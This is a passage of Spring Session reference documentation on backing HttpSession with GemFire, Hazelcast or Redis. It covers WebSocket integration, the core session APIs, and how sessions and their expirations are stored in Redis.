application.\n\ninclude::guides\/httpsession-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire]]\n=== HttpSession with Pivotal GemFire\n\nWhen https:\/\/pivotal.io\/big-data\/pivotal-gemfire[Pivotal GemFire] is used with Spring Session, a web application's\n`HttpSession` can be replaced with a **clustered** implementation managed by GemFire and conveniently accessed\nwith Spring Session's API.\n\nThe two most common topologies to manage Spring Sessions using GemFire include:\n\n* <<httpsession-gemfire-clientserver,Client-Server>>\n* <<httpsession-gemfire-p2p,Peer-To-Peer (P2P)>>\n\nAdditionally, GemFire supports site-to-site replication using http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/topologies_and_comm\/multi_site_configuration\/chapter_overview.html[WAN functionality].\nThe ability to configure and use GemFire's WAN support is independent of Spring Session, and is beyond the scope\nof this document. More details on GemFire WAN functionality can be found http:\/\/docs.spring.io\/spring-data-gemfire\/docs\/current\/reference\/html\/#bootstrap:gateway[here].\n\n[[httpsession-gemfire-clientserver]]\n==== GemFire Client-Server\n\nThe http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/topologies_and_comm\/cs_configuration\/chapter_overview.html[Client-Server]\ntopology will probably be the more common configuration preference for users when using GemFire as a provider in\nSpring Session since a GemFire server will have significantly different and unique JVM heap requirements when compared\nto the application. Using a client-server topology enables an application to manage (e.g. replicate) application state\nindependently from other application processes.\n\nIn a client-server topology, an application using Spring Session will open a client cache connection to a (remote)\nGemFire server cluster to manage and provide consistent access to all `HttpSession` state.\n\nYou can configure a Client-Server topology with either:\n\n* <<httpsession-gemfire-clientserver-java,Java-based Configuration>>\n* <<httpsession-gemfire-clientserver-xml,XML-based Configuration>>\n\n[[httpsession-gemfire-clientserver-java]]\n===== GemFire Client-Server Java-based Configuration\n\nThis section describes how to use GemFire's Client-Server topology to back an `HttpSession` with Java-based configuration.\n\nNOTE: The <<samples,HttpSession with GemFire (Client-Server) Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the HttpSession using Java configuration. You can read the basic steps for\nintegration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (Client-Server)\nGuide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-clientserver.adoc[tags=config,leveloffset=+3]\n\n[[http-session-gemfire-clientserver-xml]]\n===== GemFire Client-Server XML-based Configuration\n\nThis section describes how to use GemFire's Client-Server topology to back an `HttpSession` with XML-based configuration.\n\nNOTE: The <<samples,HttpSession with GemFire (Client-Server) using XML Sample>> provides a working sample on how to\nintegrate Spring Session and GemFire to replace the `HttpSession` using XML configuration. You can read the basic steps\nfor integration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (Client-Server)\nusing XML Guide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-clientserver-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire-p2p]]\n==== GemFire Peer-To-Peer (P2P)\n\nPerhaps less common would be to configure the Spring Session application as a peer member in the GemFire cluster using\nthe http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/topologies_and_comm\/p2p_configuration\/chapter_overview.html[Peer-To-Peer (P2P)] topology.\nIn this configuration, a Spring Session application would be an actual data node (server) in the GemFire cluster,\nand **not** a cache client as before.\n\nOne advantage to this approach is the proximity of the application to the application's state (i.e. it's data). However,\nthere are other effective means of accomplishing similar data dependent computations, such as using GemFire's\nhttp:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/function_exec\/chapter_overview.html[Function Execution].\nAny of GemFire's other http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/getting_started\/product_intro.html[features]\ncan be used when GemFire is serving as a provider in Spring Session.\n\nP2P is very useful for both testing purposes as well as smaller, more focused and self-contained applications,\nsuch as those found in a microservices architecture, and will most certainly improve on your application's latency,\nthroughput and consistency needs.\n\nYou can configure a Peer-To-Peer (P2P) topology with either:\n\n* <<httpsession-gemfire-p2p-java,Java-based Configuration>>\n* <<httpsession-gemfire-p2p-xml,XML-based Configuration>>\n\n[[httpsession-gemfire-p2p-java]]\n===== GemFire Peer-To-Peer (P2P) Java-based Configuration\n\nThis section describes how to use GemFire's Peer-To-Peer (P2P) topology to back an `HttpSession` using Java-based configuration.\n\nNOTE: The <<samples, HttpSession with GemFire (P2P) Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the `HttpSession` using Java configuration. You can read the basic steps\nfor integration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (P2P) Guide\nwhen integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-p2p.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire-p2p-xml]]\n===== GemFire Peer-To-Peer (P2P) XML-based Configuration\n\nThis section describes how to use GemFire's Peer-To-Peer (P2P) topology to back an `HttpSession` using XML-based configuration.\n\nNOTE: The <<samples, HttpSession with GemFire (P2P) using XML Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the `HttpSession` using XML configuration. You can read the basic steps for\nintegration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (P2P) using XML\nGuide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-p2p-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-how]]\n=== How HttpSession Integration Works\n\nFortunately both `HttpSession` and `HttpServletRequest` (the API for obtaining an `HttpSession`) are both interfaces.\nThis means that we can provide our own implementations for each of these APIs.\n\nNOTE: This section describes how Spring Session provides transparent integration with `HttpSession`. The intent is so that user's can understand what is happening under the covers. This functionality is already integrated and you do NOT need to implement this logic yourself.\n\nFirst we create a custom `HttpServletRequest` that returns a custom implementation of `HttpSession`.\nIt looks something like the following:\n\n[source, java]\n----\npublic class SessionRepositoryRequestWrapper extends HttpServletRequestWrapper {\n\n\tpublic SessionRepositoryRequestWrapper(HttpServletRequest original) {\n\t\tsuper(original);\n\t}\n\n\tpublic HttpSession getSession() {\n\t\treturn getSession(true);\n\t}\n\n\tpublic HttpSession getSession(boolean createNew) {\n\t\t\/\/ create an HttpSession implementation from Spring Session\n\t}\n\n\t\/\/ ... other methods delegate to the original HttpServletRequest ...\n}\n----\n\nAny method that returns an `HttpSession` is overridden.\nAll other methods are implemented by `HttpServletRequestWrapper` and simply delegate to the original `HttpServletRequest` implementation.\n\nWe replace the `HttpServletRequest` implementation using a servlet `Filter` called `SessionRepositoryFilter`.\nThe pseudocode can be found below:\n\n[source, java]\n----\npublic class SessionRepositoryFilter implements Filter {\n\n\tpublic doFilter(ServletRequest request, ServletResponse response, FilterChain chain) {\n\t\tHttpServletRequest httpRequest = (HttpServletRequest) request;\n\t\tSessionRepositoryRequestWrapper customRequest =\n\t\t\tnew SessionRepositoryRequestWrapper(httpRequest);\n\n\t\tchain.doFilter(customRequest, response, chain);\n\t}\n\n\t\/\/ ...\n}\n----\n\nBy passing in a custom `HttpServletRequest` implementation into the `FilterChain` we ensure that anything invoked after our `Filter` uses the custom `HttpSession` implementation.\nThis highlights why it is important that Spring Session's `SessionRepositoryFilter` must be placed before anything that interacts with the `HttpSession`.\n\n[[httpsession-multi]]\n=== Multiple HttpSessions in Single Browser\n\nSpring Session has the ability to support multiple sessions in a single browser instance.\nThis provides the ability to support authenticating with multiple users in the same browser instance (i.e. Google Accounts).\n\nNOTE: The <<samples,Manage Multiple Users Guide>> provides a complete working example of managing multiple users in the same browser instance.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed Manage Multiple Users Guide when integrating with your own application.\n\ninclude::guides\/users.adoc[tags=how-does-it-work,leveloffset=+1]\n\n[[httpsession-rest]]\n=== HttpSession & RESTful APIs\n\nSpring Session can work with RESTful APIs by allowing the session to be provided in a header.\n\n\nNOTE: The <<samples, REST Sample>> provides a working sample on how to use Spring Session in a REST application to support authenticating with a header.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed REST Guide when integrating with your own application.\n\ninclude::guides\/rest.adoc[tags=config,leveloffset=+2]\n\n[[httpsession-httpsessionlistener]]\n=== HttpSessionListener\n\nSpring Session supports `HttpSessionListener` by translating `SessionDestroyedEvent` and `SessionCreatedEvent` into `HttpSessionEvent` by declaring `SessionEventHttpSessionListenerAdapter`.\nTo use this support, you need to:\n\n* Ensure your `SessionRepository` implementation supports and is configured to fire `SessionDestroyedEvent` and `SessionCreatedEvent`.\n* Configure `SessionEventHttpSessionListenerAdapter` as a Spring bean.\n* Inject every `HttpSessionListener` into the `SessionEventHttpSessionListenerAdapter`\n\nIf you are using the configuration support documented in <<httpsession-redis,HttpSession with Redis>>, then all you need to do is register every `HttpSessionListener` as a bean.\nFor example, assume you want to support Spring Security's concurrency control and need to use `HttpSessionEventPublisher` you can simply add `HttpSessionEventPublisher` as a bean.\nIn Java configuration, this might look like:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/http\/RedisHttpSessionConfig.java[tags=config]\n----\n\nIn XML configuration, this might look like:\n\n[source,xml,indent=0]\n----\ninclude::{docs-test-resources-dir}docs\/http\/HttpSessionListenerXmlTests-context.xml[tags=config]\n----\n\n[[websocket]]\n== WebSocket Integration\n\nSpring Session provides transparent integration with Spring's WebSocket support.\n\ninclude::guides\/websocket.adoc[tags=disclaimer,leveloffset=+1]\n\n[[websocket-why]]\n=== Why Spring Session & WebSockets?\n\nSo why do we need Spring Session when using WebSockets?\n\nConsider an email application that does much of its work through HTTP requests.\nHowever, there is also a chat application embedded within it that works over WebSocket APIs.\nIf a user is actively chatting with someone, we should not timeout the `HttpSession` since this would be pretty poor user experience.\nHowever, this is exactly what https:\/\/java.net\/jira\/browse\/WEBSOCKET_SPEC-175[JSR-356] does.\n\nAnother issue is that according to JSR-356 if the `HttpSession` times out any WebSocket that was created with that HttpSession and an authenticated user should be forcibly closed.\nThis means that if we are actively chatting in our application and are not using the HttpSession, then we will also disconnect from our conversation!\n\n[[websocket-usage]]\n=== WebSocket Usage\n\nThe <<samples, WebSocket Sample>> provides a working sample on how to integrate Spring Session with WebSockets.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed WebSocket Guide when integrating with your own application:\n\n[[websocket-httpsession]]\n==== HttpSession Integration\n\nBefore using WebSocket integration, you should be sure that you have <<httpsession>> working first.\n\ninclude::guides\/websocket.adoc[tags=config,leveloffset=+2]\n\n[[api]]\n== API Documentation\n\nYou can browse the complete link:..\/..\/api\/[Javadoc] online. The key APIs are described below:\n\n[[api-session]]\n=== Session\n\nA `Session` is a simplified `Map` of name value pairs.\n\nTypical usage might look like the following:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=repository-demo]\n----\n\n<1> We create a `SessionRepository` instance with a generic type, `S`, that extends `Session`. The generic type is defined in our class.\n<2> We create a new `Session` using our `SessionRepository` and assign it to a variable of type `S`.\n<3> We interact with the `Session`. In our example, we demonstrate saving a `User` to the `Session`.\n<4> We now save the `Session`. This is why we needed the generic type `S`. The `SessionRepository` only allows saving `Session` instances that were created or retrieved using the same `SessionRepository`. This allows for the `SessionRepository` to make implementation specific optimizations (i.e. only writing attributes that have changed).\n<5> We retrieve the `Session` from the `SessionRepository`.\n<6> We obtain the persisted `User` from our `Session` without the need for explicitly casting our attribute.\n\n[[api-expiringsession]]\n=== ExpiringSession\n\nAn `ExpiringSession` extends a `Session` by providing attributes related to the `Session` instance's expiration.\nIf there is no need to interact with the expiration information, prefer using the more simple `Session` API.\n\nTypical usage might look like the following:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=expire-repository-demo]\n----\n\n<1> We create a `SessionRepository` instance with a generic type, `S`, that extends `ExpiringSession`. The generic type is defined in our class.\n<2> We create a new `ExpiringSession` using our `SessionRepository` and assign it to a variable of type `S`.\n<3> We interact with the `ExpiringSession`.\nIn our example, we demonstrate updating the amount of time the `ExpiringSession` can be inactive before it expires.\n<4> We now save the `ExpiringSession`.\nThis is why we needed the generic type `S`.\nThe `SessionRepository` only allows saving `ExpiringSession` instances that were created or retrieved using the same `SessionRepository`.\nThis allows for the `SessionRepository` to make implementation specific optimizations (i.e. only writing attributes that have changed).\nThe last accessed time is automatically updated when the `ExpiringSession` is saved.\n<5> We retrieve the `ExpiringSession` from the `SessionRepository`.\nIf the `ExpiringSession` were expired, the result would be null.\n\n[[api-sessionrepository]]\n=== SessionRepository\n\nA `SessionRepository` is in charge of creating, retrieving, and persisting `Session` instances.\n\nIf possible, developers should not interact directly with a `SessionRepository` or a `Session`.\nInstead, developers should prefer interacting with `SessionRepository` and `Session` indirectly through the <<httpsession,HttpSession>> and <<websocket,WebSocket>> integration.\n\n[[api-findbyindexnamesessionrepository]]\n=== FindByIndexNameSessionRepository\n\nSpring Session's most basic API for using a `Session` is the `SessionRepository`.\nThis API is intentionally very simple, so that it is easy to provide additional implementations with basic functionality.\n\nSome `SessionRepository` implementations may choose to implement `FindByIndexNameSessionRepository` also.\nFor example, Spring's Redis support implements `FindByIndexNameSessionRepository`.\n\nThe `FindByIndexNameSessionRepository` adds a single method to look up all the sessions for a particular user.\nThis is done by ensuring that the session attribute with the name `FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME` is populated with the username.\nIt is the responsibility of the developer to ensure the attribute is populated since Spring Session is not aware of the authentication mechanism being used.\nAn example of how this might be used can be seen below:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/FindByIndexNameSessionRepositoryTests.java[tags=set-username]\n----\n\n[NOTE]\n====\nSome implementations of `FindByIndexNameSessionRepository` will provide hooks to automatically index other session attributes.\nFor example, many implementations will automatically ensure the current Spring Security user name is indexed with the index name `FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME`.\n====\n\nOnce the session is indexed, it can be found using the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/FindByIndexNameSessionRepositoryTests.java[tags=findby-username]\n----\n\n[[api-enablespringhttpsession]]\n=== EnableSpringHttpSession\n\nThe `@EnableSpringHttpSession` annotation can be added to an `@Configuration` class to expose the `SessionRepositoryFilter` as a bean named \"springSessionRepositoryFilter\".\nIn order to leverage the annotation, a single `SessionRepository` bean must be provided.\nFor example:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/SpringHttpSessionConfig.java[tags=class]\n----\n\nIt is important to note that no infrastructure for session expirations is configured for you out of the box.\nThis is because things like session expiration are highly implementation dependent.\nThis means if you require cleaning up expired sessions, you are responsible for cleaning up the expired sessions.\n\n[[api-enablehazelcasthttpsession]]\n=== EnableHazelcastHttpSession\n\nIf you wish to use http:\/\/hazelcast.org\/[Hazelcast] as your backing source for the `SessionRepository`, then the `@EnableHazelcastHttpSession` annotation\ncan be added to an `@Configuration` class. This extends the functionality provided by the `@EnableSpringHttpSession` annotation but makes the `SessionRepository` for you in Hazelcast.\nYou must provide a single `HazelcastInstance` bean for the configuration to work.\nFor example:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/http\/HazelcastHttpSessionConfig.java[tags=config]\n----\n\nThis will configure Hazelcast in embedded mode with default configuration.\nSee the http:\/\/docs.hazelcast.org\/docs\/latest\/manual\/html-single\/index.html#hazelcast-configuration[Hazelcast documentation] for\ndetailed information on configuration options for Hazelcast.\n\n[[api-enablehazelcasthttpsession-storage]]\n==== Storage Details\n\nSessions will be stored in a distributed `Map` in Hazelcast using a <<api-mapsessionrepository,MapSessionRepository>>.\nThe `Map` interface methods will be used to `get()` and `put()` Sessions.\nThe expiration of a session in the `Map` is handled by Hazelcast's support for setting the time to live on an entry when it is `put()` into the `Map`. Entries (sessions) that have been idle longer than the time to live will be automatically removed from the `Map`.\n\nYou shouldn't need to configure any settings such as `max-idle-seconds` or `time-to-live-seconds` for the `Map` within the Hazelcast configuration.\n\n[[api-enablehazelcasthttpsession-customize]]\n==== Basic Customization\nYou can use the following attributes on `@EnableHazelcastHttpSession` to customize the configuration:\n\n* **maxInactiveIntervalInSeconds** - the amount of time before the session will expire in seconds. Default is 1800 seconds (30 minutes)\n* **sessionMapName** - the name of the distributed `Map` that will be used in Hazelcast to store the session data.\n\n[[api-enablehazelcasthttpsession-events]]\n==== Session Events\nUsing a `MapListener` to respond to entries being added, evicted, and removed from the distributed `Map`, these events will trigger\npublishing SessionCreatedEvent, SessionExpiredEvent, and SessionDeletedEvent events respectively using the `ApplicationEventPublisher`.\n\n[[api-redisoperationssessionrepository]]\n=== RedisOperationsSessionRepository\n\n`RedisOperationsSessionRepository` is a `SessionRepository` that is implemented using Spring Data's `RedisOperations`.\nIn a web environment, this is typically used in combination with `SessionRepositoryFilter`.\nThe implementation supports `SessionDestroyedEvent` and `SessionCreatedEvent` through `SessionMessageListener`.\n\n[[api-redisoperationssessionrepository-new]]\n==== Instantiating a RedisOperationsSessionRepository\n\nA typical example of how to create a new instance can be seen below:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=new-redisoperationssessionrepository]\n----\n\nFor additional information on how to create a `RedisConnectionFactory`, refer to the Spring Data Redis Reference.\n\n[[api-redisoperationssessionrepository-config]]\n==== EnableRedisHttpSession\n\nIn a web environment, the simplest way to create a new `RedisOperationsSessionRepository` is to use `@EnableRedisHttpSession`.\nComplete example usage can be found in the <<samples>>\nYou can use the following attributes to customize the configuration:\n\n* **maxInactiveIntervalInSeconds** - the amount of time before the session will expire in seconds\n* **redisNamespace** - allows configuring an application specific namespace for the sessions. Redis keys and channel ids will start with the prefix of `spring:session:<redisNamespace>:`.\n* **redisFlushMode** - allows specifying when data will be written to Redis. The default is only when `save` is invoked on `SessionRepository`.\nA value of `RedisFlushMode.IMMEDIATE` will write to Redis as soon as possible.\n\n===== Custom RedisSerializer\n\nYou can customize the serialization by creating a Bean named `springSessionDefaultRedisSerializer` that implements `RedisSerializer<Object>`.\n\n==== Redis TaskExecutor\n\n`RedisOperationsSessionRepository` is subscribed to receive events from redis using a `RedisMessageListenerContainer`.\nYou can customize the way those events are dispatched, by creating a Bean named `springSessionRedisTaskExecutor` and\/or a Bean `springSessionRedisSubscriptionExecutor`.\nMore details on configuring redis task executors can be found http:\/\/docs.spring.io\/spring-data-redis\/docs\/current\/reference\/html\/#redis:pubsub:subscribe:containers[here].\n\n[[api-redisoperationssessionrepository-storage]]\n==== Storage Details\n\nThe sections below outline how Redis is updated for each operation.\nAn example of creating a new session can be found below.\nThe subsequent sections describe the details.\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe creationTime 1404360000000 \\\n\tmaxInactiveInterval 1800 \\\n\tlastAccessedTime 1404360000000 \\\n\tsessionAttr:attrName someAttrValue \\\n\tsessionAttr2:attrName someAttrValue2\nEXPIRE spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe 2100\nAPPEND spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe \"\"\nEXPIRE spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe 1800\nSADD spring:session:expirations:1439245080000 expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe\nEXPIRE spring:session:expirations1439245080000 2100\n----\n\n===== Saving a Session\n\nEach session is stored in Redis as a Hash.\nEach session is set and updated using the HMSET command.\nAn example of how each session is stored can be seen below.\n\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe creationTime 1404360000000 \\\n\tmaxInactiveInterval 1800 \\\n\tlastAccessedTime 1404360000000 \\\n\tsessionAttr:attrName someAttrValue \\\n\tsessionAttr2:attrName someAttrValue2\n----\n\nIn this example, the session following statements are true about the session:\n\n* The session id is 33fdd1b6-b496-4b33-9f7d-df96679d32fe\n* The session was created at 1404360000000 in milliseconds since midnight of 1\/1\/1970 GMT.\n* The session expires in 1800 seconds (30 minutes).\n* The session was last accessed at 1404360000000 in milliseconds since midnight of 1\/1\/1970 GMT.\n* The session has two attributes.\nThe first is \"attrName\" with the value of \"someAttrValue\".\nThe second session attribute is named \"attrName2\" with the value of \"someAttrValue2\".\n\n[[api-redisoperationssessionrepository-writes]]\n===== Optimized Writes\n\nThe `Session` instances managed by `RedisOperationsSessionRepository` keeps track of the properties that have changed and only updates those.\nThis means if an attribute is written once and read many times we only need to write that attribute once.\nFor example, assume the session attribute \"sessionAttr2\" from earlier was updated.\nThe following would be executed upon saving:\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe sessionAttr:attrName2 newValue\n----\n\n[[api-redisoperationssessionrepository-expiration]]\n===== Session Expiration\n\nAn expiration is associated to each session using the EXPIRE command based upon the `ExpiringSession.getMaxInactiveInterval()`.\nFor example:\n\n----\nEXPIRE spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe 2100\n----\n\nYou will note that the expiration that is set is 5 minutes after the session actually expires.\nThis is necessary so that the value of the session can be accessed when the session expires.\nAn expiration is set on the session itself five minutes after it actually expires to ensure it is cleaned up, but only after we perform any necessary processing.\n\n[NOTE]\n====\nThe `SessionRepository.getSession(String)` method ensures that no expired sessions will be returned.\nThis means there is no need to check the expiration before using a session.\n====\n\nSpring Session relies on the delete and expired http:\/\/redis.io\/topics\/notifications[keyspace notifications] from Redis to fire a <<api-redisoperationssessionrepository-sessiondestroyedevent,SessionDeletedEvent>> and <<api-redisoperationssessionrepository-sessiondestroyedevent,SessionExpiredEvent>> respectively.\nIt is the `SessionDeletedEvent` or `SessionExpiredEvent` that ensures resources associated with the Session are cleaned up.\nFor example, when using Spring Session's WebSocket support the Redis expired or delete event is what triggers any WebSocket connections associated with the session to be closed.\n\nExpiration is not tracked directly on the session key itself since this would mean the session data would no longer be available. Instead a special session expires key is used. In our example the expires key is:\n\n----\nAPPEND spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe \"\"\nEXPIRE spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe 1800\n----\n\nWhen a session expires key is deleted or expires, the keyspace notification triggers a lookup of the actual session and a SessionDestroyedEvent is fired.\n\nOne problem with relying on Redis expiration exclusively is that Redis makes no guarantee of when the expired event will be fired if they key has not been accessed.\nSpecifically the background task that Redis uses to clean up expired keys is a low priority task and may not trigger the key expiration.\nFor additional details see http:\/\/redis.io\/topics\/notifications[Timing of expired events] section in the Redis documentation.\n\nTo circumvent the fact that expired events are not guaranteed to happen we can ensure that each key is accessed when it is expected to expire.\nThis means that if the TTL is expired on the key, Redis will remove the key and fire the expired event when we try to access they key.\n\nFor this reason, each session expiration is also tracked to the nearest minute.\nThis allows a background task to access the potentially expired sessions to ensure that Redis expired events are fired in a more deterministic fashion.\nFor example:\n\n----\nSADD spring:session:expirations:1439245080000 expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe\nEXPIRE spring:session:expirations1439245080000 2100\n----\n\nThe background task will then use these mappings to explicitly request each key.\nBy accessing they key, rather than deleting it, we ensure that Redis deletes the key for us only if the TTL is expired.\n\n[NOTE]\n====\nWe do not explicitly delete the keys since in some instances there may be a race condition that incorrectly identifies a key as expired when it is not.\nShort of using distributed locks (which would kill our performance) there is no way to ensure the consistency of the expiration mapping.\nBy simply accessing the key, we ensure that the key is only removed if the TTL on that key is expired.\n====\n\n\n[[api-redisoperationssessionrepository-sessiondestroyedevent]]\n==== SessionDeletedEvent and SessionExpiredEvent\n\n`SessionDeletedEvent` and `SessionExpiredEvent` are both types of `SessionDestroyedEvent`.\n\n`RedisOperationsSessionRepository` supports firing a `SessionDeletedEvent` whenever a `Session` is deleted or a `SessionExpiredEvent` when it expires.\nThis is necessary to ensure resources associated with the `Session` are properly cleaned up.\n\nFor example, when integrating with WebSockets the `SessionDestroyedEvent` is in charge of closing any active WebSocket connections.\n\nFiring `SessionDeletedEvent` or `SessionExpiredEvent` is made available through the `SessionMessageListener` which listens to http:\/\/redis.io\/topics\/notifications[Redis Keyspace events].\nIn order for this to work, Redis Keyspace events for Generic commands and Expired events needs to be enabled.\nFor example:\n\n[source,bash]\n----\nredis-cli config set notify-keyspace-events Egx\n----\n\nIf you are using `@EnableRedisHttpSession` the `SessionMessageListener` and enabling the necessary Redis Keyspace events is done automatically.\nHowever, in a secured Redis enviornment the config command is disabled.\nThis means that Spring Session cannot configure Redis Keyspace events for you.\nTo disable the automatic configuration add `ConfigureRedisAction.NO_OP` as a bean.\n\nFor example, Java Configuration can use the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/RedisHttpSessionConfigurationNoOpConfigureRedisActionTests.java[tags=configure-redis-action]\n----\n\nXML Configuraiton can use the following:\n\n[source,xml,indent=0]\n----\ninclude::{docs-test-resources-dir}docs\/HttpSessionConfigurationNoOpConfigureRedisActionXmlTests-context.xml[tags=configure-redis-action]\n----\n\n[[api-redisoperationssessionrepository-sessioncreatedevent]]\n==== SessionCreatedEvent\n\nWhen a session is created an event is sent to Redis with the channel of `spring:session:channel:created:33fdd1b6-b496-4b33-9f7d-df96679d32fe`\nsuch that `33fdd1b6-b496-4b33-9f7d-df96679d32fe` is the session id. The body of the event will be the session that was created.\n\nIf registered as a MessageListener (default), then `RedisOperationsSessionRepository` will then translate the Redis message into a `SessionCreatedEvent`.\n\n[[api-redisoperationssessionrepository-cli]]\n==== Viewing the Session in Redis\n\nAfter http:\/\/redis.io\/topics\/quickstart[installing redis-cli], you can inspect the values in Redis http:\/\/redis.io\/commands#hash[using the redis-cli].\nFor example, enter the following into a terminal:\n\n[source,bash]\n----\n$ redis-cli\nredis 127.0.0.1:6379> keys *\n1) \"spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021\" <1>\n2) \"spring:session:expirations:1418772300000\" <2>\n----\n\n<1> The suffix of this key is the session identifier of the Spring Session.\n<2> This key contains all the session ids that should be deleted at the time `1418772300000`.\n\nYou can also view the attributes of each session.\n\n[source,bash]\n----\nredis 127.0.0.1:6379> hkeys spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021\n1) \"lastAccessedTime\"\n2) \"creationTime\"\n3) \"maxInactiveInterval\"\n4) \"sessionAttr:username\"\nredis 127.0.0.1:6379> hget spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021 sessionAttr:username\n\"\\xac\\xed\\x00\\x05t\\x00\\x03rob\"\n----\n\n[[api-gemfireoperationssessionrepository]]\n=== GemFireOperationsSessionRepository\n\n`GemFireOperationsSessionRepository` is a `SessionRepository` that is implemented using Spring Data's `GemFireOperationsSessionRepository`.\nIn a web environment, this is typically used in combination with `SessionRepositoryFilter`.\nThe implementation supports `SessionDestroyedEvent` and `SessionCreatedEvent` through `SessionMessageListener`.\n\n[[api-gemfireoperationssessionrepository-indexing]]\n==== Using Indexes with GemFire\n\nWhile best practices concerning the proper definition of indexes that positively impact GemFire's performance is beyond\nthe scope of this document, it is important to realize that Spring Session Data GemFire creates and uses indexes to\nquery and find Sessions efficiently.\n\nOut-of-the-box, Spring Session Data GemFire creates 1 Hash-typed Index on the principal name. There are two different buit in\nstrategies for finding the principal name. The first strategy is that the value of the session attribute with the name\n`FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME` will be indexed to the same index name. For example:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyindexname-set]\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyindexname-get]\n----\n\n[[api-gemfireoperationssessionrepository-indexing-security]]\n==== Using Indexes with GemFire & Spring Security\n\nAlternatively, Spring Session Data GemFire will map Spring Security's current `Authentication#getName()` to the index\n`FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME`. For example, if you are using Spring Security you can\nfind the current user's sessions using:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyspringsecurityindexname-context]\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyspringsecurityindexname-get]\n----\n\n[[api-gemfireoperationssessionrepository-indexing-custom]]\n==== Using Custom Indexes with GemFire\n\nThis enables developers using the `GemFireOperationsSessionRepository` programmatically to query and find all Sessions\nwith a given principal name efficiently.\n\nAdditionally, Spring Session Data GemFire will create a Range-based Index on the implementing Session's Map-type\n`attributes` property (i.e. on any arbitrary Session attribute) when a developer identifies 1 or more named Session\nattributes that should be indexed by GemFire.\n\nSessions attributes to index can be specified with the `indexableSessionAttributes` attribute on the `@EnableGemFireHttpSession`\nannotation. A developer adds this annotation to their Spring application `@Configuration` class when s\/he wishes to\nenable Spring Session support for HttpSession backed by GemFire.\n\nFor example, the following configuration:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/GemFireHttpSessionConfig.java[tags=class-start]\n\t\/\/ ...\n}\n----\n\nwill allow searching for sessions using the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/HttpSessionGemFireIndexingCustomITests.java[tags=findbyindexname-set]\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/HttpSessionGemFireIndexingCustomITests.java[tags=findbyindexname-get]\n----\n\nNOTE: Only Session attribute names identified in the `@EnableGemFireHttpSession` annotation's `indexableSessionAttributes`\nattribute will have an Index defined. All other Session attributes will not be indexed.\n\nHowever, there is one caveat. Any values stored in indexable Session attributes must implement the `java.lang.Comparable<T>`\ninterface. If those object values do not implement `Comparable`, then GemFire will throw an error on startup when the\nIndex is defined for Regions with persistent Session data, or when an attempt is made at runtime to assign the indexable\nSession attribute a value that is not `Comparable` and the Session is saved to GemFire.\n\nNOTE: Any Session attribute that is not indexed may store non-`Comparable` values.\n\nTo learn more about GemFire's Range-based Indexes, see 